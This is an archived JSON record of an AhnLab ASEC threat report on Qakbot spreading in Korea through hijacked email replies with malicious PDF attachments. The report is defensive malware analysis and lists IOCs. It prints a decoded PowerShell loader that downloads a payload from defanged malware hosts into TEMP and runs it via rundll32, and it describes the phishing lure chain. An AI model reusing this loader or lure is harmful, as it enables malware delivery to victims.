{
	"id": "1995d5bf-d8ce-42cc-ad2c-915c7bfe95ad",
	"created_at": "2026-04-06T00:20:07.1976Z",
	"updated_at": "2026-04-10T03:20:49.368512Z",
	"deleted_at": null,
	"sha1_hash": "b5fb56f18445d379ea8323ffae4a99a292f43190",
	"title": "Qakbot Being Distributed in Korea Through Email Hijacking - ASEC",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1803106,
	"plain_text": "Qakbot Being Distributed in Korea Through Email Hijacking - ASEC\r\nBy ATCP\r\nPublished: 2023-04-06 · Archived: 2026-04-05 17:37:39 UTC\r\nAhnLab Security Emergency response Center (ASEC) has identified Qakbot being distributed via malicious PDF files attached to forwarded emails or replies to existing emails. Qakbot is a banking malware that continues to be distributed through various media. ASEC has covered the distribution trends of Qakbot over the years.\r\nAs shown below, the distributed email takes the form of a hijacked legitimate email: a reply is sent to the target user with a malicious file attached, and the recipient and CC lists of the original email are reused as the recipient addresses. The original emails were sent between 2018 and 2022, so they are not recent. The bodies and attachments of the replies are unrelated to the original email, but they contain messages prompting the user to open the attachment. Recipients may open the attachment believing it to be a normal reply, so caution is advised.\r\nFigure 1. Email with a malicious PDF attachment (1)\r\nhttps://asec.ahnlab.com/en/51282/\r\nPage 1 of 5\n\nFigure 2. Email with a malicious PDF attachment (2)\r\nFigure 3. Email with a malicious PDF attachment (3)\r\nThe PDF files attached to the emails have filenames made of random characters, such as ‘UT.PDF’, ‘RA.PDF’, and ‘NM.PDF’, seemingly generated by automation. When a PDF file is opened, it displays a page containing the Microsoft Azure logo and a message persuading the user to click the Open button, as shown below. Clicking the Open button redirects the user to a malicious URL, and once a connection is established, a password-protected ZIP file is downloaded. 
This password-protected ZIP file can be decompressed with the ‘Password: 755’ written in the PDF file.\r\nFigure 4. Screen upon opening the PDF file attached to the email\r\nFigure 5. Compressed file downloaded from the URL within the PDF file\r\nInvestigation of the WSF file created upon decompression reveals script code obfuscated among dummy text to bypass antivirus detection, as shown below. The meaningful script code lies after the \u003cjob\u003e tag.\r\nFigure 6. WSF script obfuscated with dummy data\r\nWhen the WSF file is executed, an encoded command is run through the PowerShell process. Decoding this data reveals the following: the Qakbot binary is downloaded from a reachable URL in the list under the file name undersluice.Calctuffs into the TMP directory and executed through the rundll32.exe process.\r\npowershell.exe” -ENC “Start-Sleep -Seconds 2;\r\n$Girnie =\r\n(“hxxp://milleniuninformatica.com[.]br/Le9/jGjSkvEqmXp,hxxps://qassimnews[.]com/yweNej/kQBDu,hxxps://stealingexcellence[.]com/rVR9r/yahxNk,h\r\nlows[.]com/ggAJ2m/kXpW59tm,hxxps://seicas[.]com/KvtM0/Uj3atvfT4E,hxxps://farmfutures[.]in/tlUtBc/IYj0K1,hxxps://alzheimersdigest[.]net/ZKpva/\r\nforeach ($reflexional in $Girnie) {try {wget $reflexional -TimeoutSec 17 -O $env:TEMP\\undersluice.Calctuffs;if ((Get-Item\r\n$env:TEMP\\undersluice.Calctuffs).length -ge 100000) {start rundll32 $env:TEMP\\\\undersluice.Calctuffs,X555;break;}}\r\ncatch {Start-Sleep -Seconds 2;}}\r\nThese URLs are currently unavailable, but internal and external infrastructure showed that the Qakbot binary had been distributed from them when a connection could be made. Multiple malicious emails with similar formats are also being distributed. Users must be cautious when opening emails from unknown sources and keep their antivirus software updated to the latest version. 
[File Detection]\r\nPhishing/PDF.Agent (2023.04.07.02)\r\nPhishing/PDF.Generic (2023.04.07.03)\r\nPhishing/PDF.Malurl (2023.04.08.00)\r\nTrojan/WSF.PSRunner (2023.04.08.00)\r\nTrojan/Win.Evo-gen.C5403438 (2023.03.31.02)\r\nTrojan/Win.Qakbot.C5406010 (2023.04.06.02)\r\nTrojan/Win.Evo-gen.C5406771 (2023.04.07.02)\r\nMD5\r\n19c1526182fe5ed0f1abfafc98d84df9\r\nb57532c33d7fead3105e9312cb544e11\r\nc9ab1cd04e796fd7f084a1dd2d40cc2d\r\nURL\r\nhttp[:]//milleniuninformatica[.]com[.]br/Le9/jGjSkvEqmXp\r\nhttps[:]//alzheimersdigest[.]net/ZKpva/55C63K\r\nhttps[:]//antoinettegabriel[.]com/YuUE/RQwyJWR2jjc\r\nhttps[:]//choicefaz[.]com[.]br/w1W2/4gPNeUm0J\r\nhttps[:]//farmfutures[.]in/tlUtBc/IYj0K1\r\nAdditional IOCs are available on AhnLab TIP.\r\nSource: https://asec.ahnlab.com/en/51282/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"references": [
		"https://asec.ahnlab.com/en/51282/"
	],
	"report_names": [
		"51282"
	],
	"threat_actors": [],
	"ts_created_at": 1775434807,
	"ts_updated_at": 1775791249,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/b5fb56f18445d379ea8323ffae4a99a292f43190.pdf",
		"text": "https://archive.orkl.eu/b5fb56f18445d379ea8323ffae4a99a292f43190.txt",
		"img": "https://archive.orkl.eu/b5fb56f18445d379ea8323ffae4a99a292f43190.jpg"
	}
}